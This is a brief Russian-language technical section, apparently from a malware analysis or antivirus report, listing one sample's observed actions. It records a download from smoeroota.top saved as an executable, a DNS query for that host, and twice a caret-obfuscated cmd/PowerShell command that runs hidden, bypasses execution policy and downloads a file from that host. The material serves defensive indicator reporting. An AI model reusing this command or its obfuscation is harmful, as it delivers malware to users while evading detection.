Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^wer^sHe^Ll.^Ex^e -E^xE^cuT^I^O^N^pO^liCy^ bypA^SS ^-^n^Op^RO^FI^Le -wiNdoWStyLE^ ^hI^D^den ^(n^eW^-ObJE^ct^ s^ysTem.ne^t.W^E^bclIe^N^T)^.dOW^N^l^oAD^FiL^e^('http://smoero...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /C "po^wer^sHe^Ll.^Ex^e -E^xE^cuT^I^O^N^pO^liCy^ bypA^SS ^-^n^Op^RO^FI^Le -wiNdoWStyLE^ ^hI^D^den ^(n^eW^-ObJE^ct^ s^ysTem.ne^t.W^E^bclIe^N^T)^.dOW^N^l^oAD^FiL^e^('http://smoero...' (со скрытым окном)